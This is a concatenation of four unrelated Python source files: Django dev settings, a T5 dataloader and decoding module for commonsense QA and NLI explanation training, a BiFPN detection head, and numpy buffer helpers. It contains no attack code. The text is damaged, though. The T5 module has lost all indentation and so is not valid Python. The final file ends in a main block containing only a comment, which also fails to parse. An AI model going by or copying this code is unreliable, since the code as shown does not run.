64919
|
from Fusion.settings.common import *

DEBUG = True
SECRET_KEY = '=<KEY>'
ALLOWED_HOSTS = []

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'fusionlab',
        'HOST': '172.27.16.216',
        'USER': 'fusion_admin',
        'PASSWORD': '<PASSWORD>',
    }
}

REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework.authentication.TokenAuthentication',
    ),
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    )
}

#DATABASES = {
#    'default': {
#        'ENGINE': 'django.db.backends.sqlite3',
#        'NAME': os.path.join(BASE_DIR, 'fusion.db'),
#    }
#}

if DEBUG:
    MIDDLEWARE += (
        'debug_toolbar.middleware.DebugToolbarMiddleware',
    )
    INSTALLED_APPS += (
        'debug_toolbar',
        'django_extensions',
    )

###############################
# DEBUG_TOOLBAR SETTINGS:     #
###############################
INTERNAL_IPS = [
    '127.0.0.1',
]
DEBUG_TOOLBAR_CONFIG = {
    'INTERCEPT_REDIRECTS': False,
}

###############################
# DJANGO_EXTENSIONS SETTINGS: #
###############################
SHELL_PLUS = "ipython"
SHELL_PLUS_PRINT_SQL = True
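
# Usage sketch (assumption: this file lives at Fusion/settings/dev.py; adjust
# the dotted path to wherever it actually sits):
#   DJANGO_SETTINGS_MODULE=Fusion.settings.dev python manage.py runserver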
|
64939
|
import torch
from typing import Sequence
from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler, TensorDataset)
import utils
from utils import CQAExample, SMExample, NLIExample
from utils import truncate_seq_pair, detok_batch
class T5Input:
def __init__(self, encoder_inputs, encoder_masks, decoder_inputs, decoder_masks, decoder_labels, choice_labels=None,
context_ids=None, explanation_ids=None):
self.encoder_inputs = encoder_inputs
self.encoder_masks = encoder_masks
self.decoder_inputs = decoder_inputs
self.decoder_masks = decoder_masks
self.decoder_labels = decoder_labels
self.choice_labels = choice_labels
self.context_ids = context_ids
self.explanation_ids = explanation_ids
def to_device(self, device):
for attr, value in self.__dict__.items():
if value is not None:
self.__dict__[attr] = value.to(device)
class T5Output:
def __init__(self, encoder_hidden_states, loss, decoder_logits, predictions=None, acc_sum=None, bleu=None,
choices_loss=None):
self.encoder_hidden_states = encoder_hidden_states
self.loss = loss
self.decoder_logits = decoder_logits
self.predictions = predictions
self.acc_sum = acc_sum
self.bleu = bleu
self.choices_loss = choices_loss
def make_t5_dataloader(args, tokenizer, sequential, do_test):
if args.dataset == 'sm':
read_func = utils.read_sm_examples
make_input_func = make_t5_sm_inputs
elif args.dataset == 'cqa':
read_func = utils.read_cqa_examples
make_input_func = make_t5_cqa_inputs
elif args.dataset == 'nli':
read_func = utils.read_nli_examples
make_input_func = make_t5_nli_inputs
train_examples = read_func(args.train_data_file)
eval_examples = read_func(args.eval_data_file)
# small data for debugging purposes
if args.small_data > 0:
train_examples = train_examples[:args.small_data]
eval_examples = eval_examples[:args.small_data]
# convert examples to lists of tensors, and put into TensorDatasets then dataloaders.
# use_explanations is a flag for excluding explanations from the inputs
train_tensors = make_input_func(args, tokenizer, train_examples)
train_data = TensorDataset(*train_tensors)
train_sampler = RandomSampler(train_data) if not sequential else SequentialSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size,
num_workers=4, pin_memory=True)
eval_tensors = make_input_func(args, tokenizer, eval_examples)
eval_data = TensorDataset(*eval_tensors)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size,
num_workers=4, pin_memory=True)
test_dataloader = None
if do_test:
test_examples = read_func(args.test_data_file)
if args.small_data > 0:
test_examples = test_examples[:args.small_data]
test_tensors = make_input_func(args, tokenizer, test_examples)
test_data = TensorDataset(*test_tensors)
test_sampler = SequentialSampler(test_data)
test_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=args.eval_batch_size,
num_workers=4, pin_memory=True)
return train_dataloader, eval_dataloader, test_dataloader
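# Usage sketch (a minimal example, assuming `args` carries the fields read above
# and the model is a HuggingFace T5):
#   from transformers import T5Tokenizer
#   tokenizer = T5Tokenizer.from_pretrained('t5-base')
#   train_dl, eval_dl, test_dl = make_t5_dataloader(args, tokenizer,
#                                                   sequential=False, do_test=True)
#   for batch in train_dl:
#       batch = tuple(t.to(device) for t in batch)  # unpack per make_t5_*_inputs order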
def make_t5_sm_inputs(args, tokenizer, examples):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
for idx, example in enumerate(examples):
qa_prefix = 'task: '
exp_prefix = 'explain: '
question_str = f'{example.statements[0]} [SEP] {example.statements[1]}'
if args.label_to_use == 't5':
answer_str = example.statements[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.statements[example.statement_label]
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
if not args.condition_on_explanation:
qa_input_str = f'[CLS] {question_str} [SEP]'
else:
qa_input_str = f'[CLS] {question_str} [SEP] {explanation_str}'
exp_input_str = f'[CLS] {question_str} [SEP]'
qa_encoder_input_str = qa_prefix + qa_input_str
qa_decoder_answer_input_str = f'The answer is: {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'The answer is: {statement}' for statement in example.statements]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_encoder_input_str = exp_prefix + exp_input_str
exp_decoder_input_str = f'My common sense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
exp_context_str = ['My common sense tells me ' for statement in example.statements]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.statement_label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
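# Note: the ordering of the lists returned by make_t5_*_inputs is load-bearing --
# TensorDataset in make_t5_dataloader yields batches as tuples in exactly this
# order, so downstream unpacking into T5Input fields must match it position by
# position.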
def make_t5_cqa_inputs(args, tokenizer, examples: Sequence[CQAExample]):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
qa_encoder_x_masks = [] # e masked as 0
qa_encoder_e_masks = [] # x masked as 0
for idx, example in enumerate(examples):
question_str = f'{example.question}'
choices_str = f'The choices are {example.choices[0]}, {example.choices[1]} and {example.choices[2]}'
# truncate question str if necessary
question_str = truncate_question_str(args, tokenizer, question_str, choices_str)
if args.label_to_use == 't5':
answer_str = example.choices[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.choices[example.label] if example.label >= 0 else ''
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
if args.explanation_only:
qa_encoder_input_str = f'task: [CLS] {choices_str} [SEP] My commonsense tells me {explanation_str}'
elif args.condition_on_explanation:
qa_encoder_input_str = f'task: [CLS] {question_str} {choices_str} [SEP] My commonsense tells me {explanation_str}'
else:
qa_encoder_input_str = f'task: [CLS] {question_str} {choices_str} [SEP]'
exp_encoder_input_str = f'explain: [CLS] {question_str} {choices_str} [SEP]'
# x,e masks
x_len = len(tokenizer.encode(f'task: [CLS] {question_str} {choices_str} [SEP] '))
qa_encoder_x_mask = [1] * x_len + [0] * (args.max_seq_len - x_len)
qa_encoder_x_masks.append(qa_encoder_x_mask)
start_len = len(tokenizer.encode('task: [CLS] '))
que_len = len(tokenizer.encode(f'task: [CLS] {question_str} '))
qa_encoder_e_mask = [1] * start_len + [0] * (que_len - start_len) + [1] * (args.max_seq_len - que_len)
qa_encoder_e_masks.append(qa_encoder_e_mask)
qa_decoder_answer_input_str = f'The answer is: {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'The answer is: {choice}' for choice in example.choices]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_decoder_input_str = f'My commonsense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
if args.rationalize:
exp_context_str = [f'The answer is {choice} because ' for choice in example.choices]
else:
exp_context_str = ['My commonsense tells me ' for choice in example.choices]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
qa_encoder_x_masks = torch.tensor(qa_encoder_x_masks, dtype=torch.long)
qa_encoder_e_masks = torch.tensor(qa_encoder_e_masks, dtype=torch.long)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks, qa_encoder_x_masks, qa_encoder_e_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
def make_t5_nli_inputs(args, tokenizer, examples: Sequence[NLIExample]):
qa_encoder_input_strs = []
qa_decoder_answer_input_strs = []
qa_decoder_answer_label_strs = []
qa_decoder_choices_input_strs = []
qa_decoder_choices_label_strs = []
exp_encoder_input_strs = []
exp_decoder_input_strs = []
exp_decoder_label_strs = []
exp_context_strs = []
exp_explanation_strs = []
for idx, example in enumerate(examples):
premise_str = example.premise
hypothesis_str = example.hypothesis
if args.label_to_use == 't5':
answer_str = example.choices[int(example.input_dict['t5_prediction'])]
else:
answer_str = example.choices[int(example.label)]
if args.explanation_to_use == 't5':
explanation_str = example.input_dict['t5_explanation']
else:
explanation_str = example.human_explanation
qa_encoder_input_str = f'task: nli premise: [CLS] {premise_str} [SEP] hypothesis: {hypothesis_str} [SEP]'
if args.condition_on_explanation:
qa_encoder_input_str = f'{qa_encoder_input_str} My commonsense tells me {explanation_str}'
exp_encoder_input_str = f'explain: nli premise: [CLS] {premise_str} [SEP] hypothesis: {hypothesis_str} [SEP]'
qa_decoder_answer_input_str = f'answer {answer_str}'
qa_decoder_answer_label_str = qa_decoder_answer_input_str
qa_decoder_choices_input_str = [f'answer {choice}' for choice in example.choices]
qa_decoder_choices_label_str = qa_decoder_choices_input_str
exp_decoder_input_str = f'My commonsense tells me {explanation_str}'
exp_decoder_label_str = exp_decoder_input_str
exp_context_str = ['My commonsense tells me ' for choice in example.choices]
exp_explanation_str = explanation_str
qa_encoder_input_strs.append(qa_encoder_input_str)
qa_decoder_answer_input_strs.append(qa_decoder_answer_input_str)
qa_decoder_answer_label_strs.append(qa_decoder_answer_label_str)
qa_decoder_choices_input_strs.append(qa_decoder_choices_input_str)
qa_decoder_choices_label_strs.append(qa_decoder_choices_label_str)
exp_encoder_input_strs.append(exp_encoder_input_str)
exp_decoder_input_strs.append(exp_decoder_input_str)
exp_decoder_label_strs.append(exp_decoder_label_str)
exp_context_strs.append(exp_context_str)
exp_explanation_strs.append(exp_explanation_str)
input_padding_id = tokenizer.pad_token_id
label_padding_id = -100
qa_encoder_inputs, qa_encoder_masks = make_t5_tensor(tokenizer, qa_encoder_input_strs, input_padding_id,
args.max_seq_len, add_eos=False, make_mask=True)
qa_decoder_answer_inputs, qa_decoder_answer_masks = make_t5_tensor(tokenizer, qa_decoder_answer_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_answer_labels = make_t5_tensor(tokenizer, qa_decoder_answer_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
qa_decoder_choices_inputs, qa_decoder_choices_masks = make_t5_tensor(tokenizer, qa_decoder_choices_input_strs,
input_padding_id,
args.max_seq_len, add_eos=False,
make_mask=True)
qa_decoder_choices_labels = make_t5_tensor(tokenizer, qa_decoder_choices_label_strs, label_padding_id,
args.max_seq_len, add_eos=False, make_mask=False)
if args.label_to_use == 't5':
qa_choice_label_list = [int(example.input_dict['t5_prediction']) for example in examples]
else:
qa_choice_label_list = [example.label for example in examples]
qa_choice_labels = torch.tensor(qa_choice_label_list, dtype=torch.long)
exp_encoder_inputs, exp_encoder_masks = make_t5_tensor(tokenizer, exp_encoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=False,
make_mask=True)
exp_decoder_inputs, exp_decoder_masks = make_t5_tensor(tokenizer, exp_decoder_input_strs,
input_padding_id, args.max_seq_len, add_eos=True,
make_mask=True)
exp_decoder_labels = make_t5_tensor(tokenizer, exp_decoder_label_strs, label_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
exp_context_ids = make_t5_tensor(tokenizer, exp_context_strs, input_padding_id, args.max_seq_len,
add_eos=False, make_mask=False)
exp_explanation_ids = make_t5_tensor(tokenizer, exp_explanation_strs, input_padding_id, args.max_seq_len,
add_eos=True, make_mask=False)
return [qa_encoder_inputs, qa_encoder_masks,
qa_decoder_answer_inputs, qa_decoder_answer_masks, qa_decoder_answer_labels,
qa_decoder_choices_inputs, qa_decoder_choices_masks, qa_decoder_choices_labels,
qa_choice_labels,
exp_encoder_inputs, exp_encoder_masks,
exp_decoder_inputs, exp_decoder_masks, exp_decoder_labels,
exp_context_ids, exp_explanation_ids]
def make_t5_tensor(tokenizer, input_strs, pad_token_id, max_seq_len, add_eos: bool, make_mask: bool):
all_input_ids = []
for input_str in input_strs:
if isinstance(input_str, str):
input_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(input_str))
input_ids += [tokenizer.eos_token_id] if add_eos else []
truncate_seq_pair(input_ids, [], max_seq_len)
input_ids += [pad_token_id] * (max_seq_len - len(input_ids)) # padding
all_input_ids.append(input_ids)
else:
input_ids = []
for choice_str in input_str:
choice_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(choice_str))
choice_ids += [tokenizer.eos_token_id] if add_eos else []
truncate_seq_pair(choice_ids, [], max_seq_len)
choice_ids += [pad_token_id] * (max_seq_len - len(choice_ids)) # padding
input_ids.append(choice_ids)
all_input_ids.append(input_ids)
tensor = torch.tensor(all_input_ids, dtype=torch.long)
if make_mask:
mask = (tensor != pad_token_id).float()
return tensor, mask
else:
return tensor
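# Worked example (a sketch; exact ids depend on the tokenizer's vocab):
# with max_seq_len=6, pad_token_id=0, add_eos=True, the string "hello world"
# might tokenize to [123, 456], become [123, 456, 1] after EOS, and pad to
# [123, 456, 1, 0, 0, 0]; make_mask=True additionally returns
# [1., 1., 1., 0., 0., 0.] marking the non-pad positions.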
def truncate_question_str(args, tokenizer, question_str, choices_str):
initial_len = len(tokenizer.encode(f'[CLS] {question_str} {choices_str} [SEP]'))
exp_len = len(tokenizer.encode('My commonsense tells me ')) + args.max_sample_len
prefix_len = len(tokenizer.encode('task: '))
cap_len = args.max_seq_len - exp_len - prefix_len
if initial_len > cap_len:
over_by = initial_len - cap_len
question_tokens = tokenizer.encode(question_str)
keep_up_to = len(question_tokens) - over_by - 1
new_question_tokens = question_tokens[:keep_up_to]
question_str = tokenizer.decode(new_question_tokens) + '?'
return question_str
def print_t5_input(args, tokenizer, input: T5Input, msg='T5Input'):
ignore_tokens_list = [tokenizer.pad_token, '[UNK]']
encoder_input_strs = detok_batch(tokenizer, input.encoder_inputs, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
decoder_input_strs = detok_batch(tokenizer, input.decoder_inputs, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
decoder_label_strs = detok_batch(tokenizer, input.decoder_labels, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
print(f'\n----{msg}----\n')
print(f'encoder_input_strs: {encoder_input_strs}')
print(f'encoder_inputs[0]: {input.encoder_inputs[0]}')
print(f'encoder_masks[0]: {input.encoder_masks[0]}')
print(f'decoder_input_strs: {decoder_input_strs}')
print(f'decoder_label_strs: {decoder_label_strs}')
if args.verbose:
print(f'decoder_inputs[0]: {input.decoder_inputs[0]}')
print(f'decoder_masks[0]: {input.decoder_masks[0]}')
print(f'decoder_labels[0]: {input.decoder_labels[0]}')
if input.choice_labels is not None:
print(f'choice_labels: {input.choice_labels}')
if input.context_ids is not None:
context_strs = detok_batch(tokenizer, input.context_ids, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'context_ids[0]: {input.context_ids[0]}')
print(f'context_strs: {context_strs}')
if input.explanation_ids is not None:
explanation_strs = detok_batch(tokenizer, input.explanation_ids, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'explanation_ids[0]: {input.explanation_ids[0]}')
print(f'explanation_strs: {explanation_strs}')
print('')
def print_t5_output(args, tokenizer, output: T5Output, msg='T5Output'):
ignore_tokens_list = [tokenizer.pad_token]
print(f'\n----{msg}----\n')
print(f'encoder_hidden_states.size(): {output.encoder_hidden_states.size()}')
if args.verbose:
print(f'encoder_hidden_states: {output.encoder_hidden_states}')
print(f'loss.size(): {output.loss.size()}')
print(f'loss: {output.loss}')
if output.choices_loss is not None:
print(f'choices_loss: {output.choices_loss}')
if output.predictions is not None: # predictions can be either (batch_size, 1) or (batch_size, max_seq_len)
if isinstance(output.predictions[0], list):
prediction_strs = detok_batch(tokenizer, output.predictions, ignore_tokens=ignore_tokens_list,
eos_token=tokenizer.eos_token)
if args.verbose:
print(f'prediction_ids[0]: {output.predictions[0]}')
print(f'prediction_strs: {prediction_strs}')
else:
print(f'predictions: {output.predictions}')
if output.acc_sum is not None:
print(f'accuracy_sum: {output.acc_sum}')
if output.bleu is not None:
print(f'bleu: {output.bleu}')
print('')
def sample_batched(model, context_ids, tokenizer, max_sample_len, model_name='T5',
input_ids=None, input_masks=None, encoder_hidden_states=None,
sampling_strategy='argmax', pad_prefix=True):
'''
Uses the model to sample continuations of context_ids until max_sample_len is hit,
with the expectation that decoding stops at a specified [end] token.
The function is batched: predictions are appended to the end of each running sequence
within a tensor of shape (batch_size x num_choices x max_seq_len).
Before samples are returned, the original context tokens in running_contexts are
overwritten with pad_token_id (when pad_prefix is True).
'''
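# Shape sketch: context_ids is (batch_size, num_choices, max_seq_len); each
# decoding step writes one predicted token after the last non-pad token of
# every (example, choice) sequence, so after k steps each running context has
# grown by at most k tokens. With pad_prefix=True, only the sampled
# continuation survives in the returned tensor.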
batch_size = context_ids.size(0)
num_choices = context_ids.size(1)
vocab_size = len(tokenizer) # NOT tokenizer.vocab_size, this attr does not update when tokens are added
pad_token_id = tokenizer.pad_token_id if tokenizer.pad_token_id is not None else 0
running_contexts = context_ids.clone()
device = context_ids.device
if model_name == 'T5':
if encoder_hidden_states is None:
encoder_outputs = model(input_ids=input_ids,
attention_mask=input_masks)
encoder_hidden_states = encoder_outputs[1]
if input_masks.shape != context_ids.shape:
input_masks = input_masks.unsqueeze(1).expand_as(context_ids)
expand_shape = list(encoder_hidden_states.shape)
expand_shape.insert(1, context_ids.size(1))
encoder_hidden_states = encoder_hidden_states.unsqueeze(1).expand(expand_shape)
# flatten for T5.forward
batch_size_by_num_choices = list(encoder_hidden_states.shape[:2])
seq_len = encoder_hidden_states.size(2)
embed_dim = encoder_hidden_states.size(3)
encoder_hidden_states = encoder_hidden_states.reshape(-1, seq_len, embed_dim)
input_masks = input_masks.reshape(-1, seq_len)
# BEGIN SAMPLING
for k in range(max_sample_len):
attention_mask = (running_contexts != pad_token_id).float()
# get locations of last non-pad tokens in each sequence for purposes of: getting predictions from logits, and updating running_contexts
# print(running_contexts)
where_last_tokens = [[question[choice_id].index(pad_token_id) - 1 for choice_id in range(num_choices)] for
question in running_contexts.tolist()]
mask = torch.zeros(batch_size, num_choices, context_ids.size(2), vocab_size)
mask = mask.to(device).float()
for i in range(running_contexts.size(0)):
for j in range(num_choices):
last_token_index = where_last_tokens[i][j]
mask[i, j, last_token_index, :] = 1
# hold onto the starting point of sampling for each context
if k == 0: init_where_last_tokens = where_last_tokens
with torch.no_grad():
if 'gpt' in model_name:
outputs = model(running_contexts, attention_mask=attention_mask)
elif 'T5' == model_name:
running_contexts = running_contexts.view(-1, seq_len)
attention_mask = attention_mask.view(-1, seq_len)
outputs = model(encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=input_masks,
decoder_input_ids=running_contexts,
decoder_attention_mask=attention_mask)
logits = outputs[0]
# unflatten for T5
if 'T5' == model_name:
running_contexts = running_contexts.view(batch_size, num_choices, seq_len)
logits = logits.view(batch_size, num_choices, seq_len, vocab_size)
# get logits corresponding to last tokens in each sequence
logits = logits * mask
logits = torch.sum(logits, dim=2) # (batch_size, num_choices, vocab_size)
if sampling_strategy == 'argmax':
preds = torch.argmax(logits, dim=-1)
else:
probs = torch.nn.functional.softmax(logits.squeeze(1), dim=1) # (batch_size, vocab_size)
preds = torch.multinomial(probs, num_samples=1)
# assign preds to the first pad location in each running_contexts[i,j,:] sequence
for i in range(batch_size):
for j in range(num_choices):
last_token_index = where_last_tokens[i][j]
running_contexts[i, j, last_token_index + 1] = preds[i, j].item()
samples = running_contexts
if pad_prefix:
for i in range(batch_size):
for j in range(num_choices):
end_of_context_index = init_where_last_tokens[i][j]
samples[i, j, :(end_of_context_index + 1)] = pad_token_id
return samples
def sample(device, model, prompts, encoder_hidden_states, input_masks, max_seq_length, tokenizer, decoder_masks=None,
sampling_strategy='argmax'):
if decoder_masks is None:
decoder_masks = (prompts!=tokenizer.pad_token_id).int()
context_lens = decoder_masks.sum(dim=-1)
batch_size, num_choices, seq_len = list(decoder_masks.shape)
finished = torch.zeros(batch_size, num_choices, dtype=torch.int32).to(device)
vocab_size = len(tokenizer)
while finished.sum().item() != batch_size*num_choices and decoder_masks.sum().item() != batch_size * num_choices * max_seq_length:
prompts = prompts.view(-1, seq_len)
input_masks = input_masks.view(-1, seq_len)
with torch.no_grad():
outputs = model(encoder_hidden_states = encoder_hidden_states,
encoder_attention_mask = input_masks,
decoder_input_ids = prompts,
decoder_attention_mask = decoder_masks)
logits = outputs[0]
prompts = prompts.view(batch_size, num_choices, seq_len)
logits = logits.view(batch_size, num_choices, seq_len, vocab_size)
if sampling_strategy == 'argmax':
pred = torch.argmax(logits, dim=-1)
elif sampling_strategy == 'multinomial':
prob = torch.nn.functional.softmax(logits, dim=-1).view(-1, vocab_size)
pred = torch.multinomial(prob, num_samples=1).view(batch_size, num_choices, seq_len)
pred = torch.cat((torch.zeros((batch_size, num_choices, 1), dtype=torch.long).to(device), pred[..., :-1]), dim=2)
prompts = decoder_masks * prompts + (1 - decoder_masks) * pred
new_masks = torch.cat((torch.ones((batch_size, num_choices, 1), dtype=torch.int32).to(device), decoder_masks[..., :-1]), dim=2)
new_tokens = (1 - decoder_masks) * new_masks * prompts
finished += (torch.ones(batch_size, num_choices, dtype=torch.int32).to(device) - finished) * \
(new_tokens.sum(dim=2) == tokenizer.eos_token_id).int()
decoder_masks = new_masks
return prompts
|
64943
|
from aw_nas.weights_manager.wrapper import BaseHead

from .classifiers import BiFPNClassifier

__all__ = ["BiFPNHead"]


class BiFPNHead(BaseHead):
    NAME = "bifpn_head"

    def __init__(
        self,
        device,
        num_classes,
        feature_channels,
        bifpn_out_channels,
        activation="swish",
        num_layers=4,
        has_background=True,
        pretrained_path=None,
        schedule_cfg=None,
    ):
        super(BiFPNHead, self).__init__(schedule_cfg)
        self.num_classes = num_classes
        num_anchors = 9
        self.reg = BiFPNClassifier(
            bifpn_out_channels, num_anchors, 4, num_layers, activation
        )
        self.cls = BiFPNClassifier(
            bifpn_out_channels,
            num_anchors,
            num_classes + int(has_background),
            num_layers,
            activation,
        )
        self.device = device
        self.pretrained_path = pretrained_path

    def forward(self, features):
        return self.cls(features), self.reg(features)
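
# Instantiation sketch (hypothetical channel/class counts; BiFPNClassifier's
# actual signature lives in .classifiers):
#   head = BiFPNHead(device="cuda", num_classes=80,
#                    feature_channels=[40, 112, 320], bifpn_out_channels=64)
#   cls_out, reg_out = head(features)  # features: list of multi-level BiFPN maps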
|
64954
|
from typing import Dict

import numpy as np


def buffer_from_example(example: Dict[str, np.ndarray],
                        leading_dims) -> Dict[str, np.ndarray]:
    buf = {}
    for key, value in example.items():
        buf[key] = np.zeros(leading_dims + value.shape, dtype=value.dtype)
    return buf


def get_leading_dims(dictionary, n_dims=1):
    values = iter(dictionary.values())
    leading_dims = next(values).shape[:n_dims]
    if not all(leading_dims == value.shape[:n_dims] for value in values):
        key, shape = [(key, value.shape[:n_dims])
                      for key, value in dictionary.items()
                      if leading_dims != value.shape[:n_dims]][0]
        raise ValueError((f'Dimensions do not match: {leading_dims} vs. '
                          f'{shape} (for key `{key}`)'))
    return leading_dims
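

if __name__ == '__main__':
    # Minimal sketch: pre-allocate a (T, B)-leading buffer from a single example
    # and read back the shared leading dims of a dict of arrays.
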